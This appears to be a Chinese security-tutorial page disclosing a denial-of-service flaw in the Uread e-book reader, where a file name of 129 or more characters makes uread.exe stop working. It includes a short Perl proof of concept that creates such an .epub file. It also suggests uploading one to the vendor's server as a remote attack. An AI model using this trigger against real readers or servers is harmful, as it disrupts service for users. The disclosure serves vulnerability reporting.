手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >Uread阅读器拒绝服务漏洞的分析与解决
Uread阅读器拒绝服务漏洞的分析与解决
摘要:Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动...

Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。

远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。

测试证明

-----------------------------------------------------------

#!/usr/bin/perl -w

$filename="a"x129;

print "------Generate testfile "a"x129.epub------n";

open(TESTFILE, ">$filename.epub");

sleep

(3);

close(TESTFILE);

print "------Complete--n";

exit

(1);

-----------------------------------------------------------

修复方案:

目前厂商还没有提供补丁或者升级程序。

【Uread阅读器拒绝服务漏洞的分析与解决】相关文章:

360杀毒软件打不开如何解决?

建站之星全版本后台通杀getshell的解析与解决方法

服务器上网站被挂Iframe木马的解决方法

Mac DNS被劫持的解决办法

ARP攻击和浏览器挟持的解决

淇晨科技网站管理系統默认漏洞的分析

拒绝服务攻击完全解析 区分DOS和DDOS

WEBSHELL箱子系统V1.0收信箱子代码漏洞分析及解决方法

腾讯手机管家怎么样清理手机的垃圾?

php intval()函数使用不当的安全漏洞分析

精品推荐
分类导航